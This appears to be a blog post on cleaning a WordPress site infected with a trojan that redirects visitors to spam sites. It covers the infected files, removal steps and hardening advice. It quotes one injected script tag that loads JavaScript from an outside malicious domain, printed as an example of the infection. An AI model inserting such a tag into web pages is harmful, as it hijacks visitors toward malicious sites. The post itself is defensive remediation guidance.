Home Experience & Tips Sharing Standard Post

Standard Post

Solutions for WordPress redirecting to malicious websites after being infected with a trojan virus

WordPress is the first choice for many foreign trade self-built websites. 35% of websites worldwide use WordPress. The ecosystem is complete, with rich plugins and themes. Because of this, WordPress security is also important. Today, a foreign trade website cannot be accessed normally. Opening the website redirects to other spam sites. Obviously, it is infected with a virus and maliciously redirected...

Updated on September 5, 2020 About 4 minutes read
WordPress中木马病毒后跳转到恶意网站的解决办法

WordPress is the preferred choice for many foreign trade independent websites. 35% of websites globally use WordPress, with a mature ecosystem and a vast array of Plugins and Themes. Precisely because of this, WordPress security is also crucial. Today, a foreign trade website was inaccessible; opening the site would redirect to other spam websites, clearly indicating a virus infection and malicious redirection. Naiba here documentsHow to Clean This Kind of WordPress Malware Script That Maliciously Redirects to Other Websites

WordPress恶意跳转

Infection Status

This malicious redirecting virus itself does not cause direct damage to the website data. It merely inserts malicious scripts that prevent your website from opening, hijacks your website's traffic to redirect to other websites, and then deceives users into allowing browser notifications to profit by displaying pop-up ads in the browser. (If you are currently affected, refer toHow to Disable Chrome Pop-up Ads in the Bottom Right Corner of Windows 10 System

Infection Mechanism

The principle of this virus is to tamper with some file data of the website (some Trojans also insert into the database) through certain vulnerabilities, inserting malicious scripts. When users visit the website, the script runs, automatically hijacking traffic and redirecting to malicious websites.

The Trojan script that Naiba encountered today inserted the following script into the website:

<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>

Malicious scripts were inserted into some files on the website, such as the following files (not limited to these):

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess

Theme files (wp-content/themes/{themeName}/)

    • footer.php
    • header.php
    • functions.php

Some Plugin files may also be infected.

Removal Methods

The malware encountered by Naiba today not only modified website file data but also infected the database. Therefore, we need to clean both the files and the database to restore the website to normal.

Method 1: Restore Using Website Backup Data

If you have a backup habit, you can directly restore the previously backed up website database and files. This is the fastest solution.

Related articles:

Method 2: Manually Remove Malware Scripts

If you don't have a backup, it's more troublesome. We need to manually clean up the Trojan script.

1. Access the website root directory through a file manager (cPanel, Baota Panel, FTP, etc.), then open index.php. You can see that a malicious script has been inserted at the beginning of the file, as shown below:

WordPress恶意跳转脚本

Checking the Theme files, you will find the following string of code inserted:

WordPress恶意代码

 

2. Delete all infected files on the website.

Of course, checking these files one by one and deleting them is a big project, so you can directly keep your upload folder and delete all other folders, then go todownload the latest WordPress installation packageupload and overwrite.

3. Upload safe website files to the server.

4. Enter the database backend to clean up contaminated database content.

数据库恶意脚本

The image above shows malicious script data found in the database, which we need to manually remove.

5. Install Wordfence to scan website files for any remaining threats.

At this point, the malicious script files on the website should be cleaned up, and the website can be accessed normally.

Security Protection

After cleaning the virus, to prevent being hacked again, we need to secure WordPress. Naiba summarizes the following key points:

  1. The administrator account must have a secure password, preferably a strong one generated automatically by WordPress.
  2. Keep WordPress and Plugin versions updated. Many foreign trade websites are never updated, inevitably encountering vulnerable versions.
  3. Do not install Themes and Plugins from unknown sources. Avoid installing cracked versions unless their safety is assured.
  4. Server security must also be considered. Keep server software versions updated and use secure passwords.
  5. You can install a security Plugin, but experience tells Naiba that against powerful viruses, security Plugins are equally ineffective.

So overall, the safest method is still to ensure password security, avoid installing random plugins and themes, and keep the version up to date.

Finally, if the malware on your website has not been removed, you can contact Naiba for paid assistance.

3/5 - (2 votes)
Previous WordPress 5.5.1 Update Log – 34 Bug Fixes and 4 Enhancements Continue reading content around the same timeline. Next WordPress CMS News Magazine Theme Download: Jannah News v5.0.7 View the next related tutorial or experience.

AI Website Building Assistant

🤖
Hello! I am the Naibabiji AI Assistant. How can I help you?
Quick Consultation: